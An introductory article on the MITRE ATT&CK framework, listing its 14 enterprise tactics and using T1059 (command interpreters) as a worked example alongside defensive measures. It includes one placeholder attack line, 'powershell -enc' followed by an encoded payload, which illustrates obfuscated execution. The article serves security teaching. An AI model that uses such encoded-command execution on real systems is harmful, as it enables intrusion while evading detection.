Introduction to MITRE ATT&CK: the map of cyber attacks

What is MITRE ATT&CK?

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a global knowledge base that catalogs the tactics and techniques used by cyber attackers in the real world. Born in 2013 as an internal MITRE Corporation project, it has become the de facto standard for security teams worldwide.

Unlike other frameworks, ATT&CK does not describe vulnerabilities or misconfigurations: it describes the behavior of attackers. This makes it a powerful tool for both attackers (red team) and defenders (blue team).

The 14 Enterprise Tactics

The Enterprise framework — the most widely used for Windows, Linux and cloud environments — is organized into 14 tactics representing the high-level objectives of an attacker:

1. Reconnaissance — Gathering information about the target before the attack
2. Resource Development — Acquiring infrastructure, accounts and tools
3. Initial Access — How the attacker enters the network (phishing, public exploits)
4. Execution — Running malicious code on the target system
5. Persistence — Mechanisms to maintain access even after a reboot
6. Privilege Escalation — Obtaining higher-level permissions
7. Defense Evasion — Techniques to avoid detection
8. Credential Access — Theft of credentials and hashes
9. Discovery — Exploration of the compromised environment
10. Lateral Movement — Moving from one system to another in the network
11. Collection — Gathering data of interest
12. Command and Control (C2) — Communication with compromised systems
13. Exfiltration — Extracting stolen data to the outside
14. Impact — Final actions: encryption, deletion, sabotage

A practical example: T1059 — Command and Scripting Interpreter

One of the most widely used techniques is T1059, falling under the Execution tactic. Attackers use legitimate command interpreters — PowerShell, bash, Python, cmd.exe — to execute malicious code, often loaded into memory without ever touching the disk.

powershell -enc [Base64EncodedPayload]

How to defend:

• Enable PowerShell logging (Script Block Logging, Transcription)
• Use AppLocker or Windows Defender Application Control
• Monitor anomalous child processes of Office, browsers, or email clients
• Integrate SIEM with specific rules for T1059

Why use ATT&CK in practice

ATT&CK is useful at all levels of a security team:

• Blue team: map detection capabilities to each technique, identify gaps
• Red team: plan realistic attack simulations based on real threat actors
• SOC analyst: correlate alerts and incidents with specific techniques for better response
• CISO / management: communicate risk levels in understandable terms

Tools like ATT&CK Navigator let you visualize on a color-coded matrix which techniques you can detect and which you cannot.

Questions about MITRE ATT&CK? Contact me.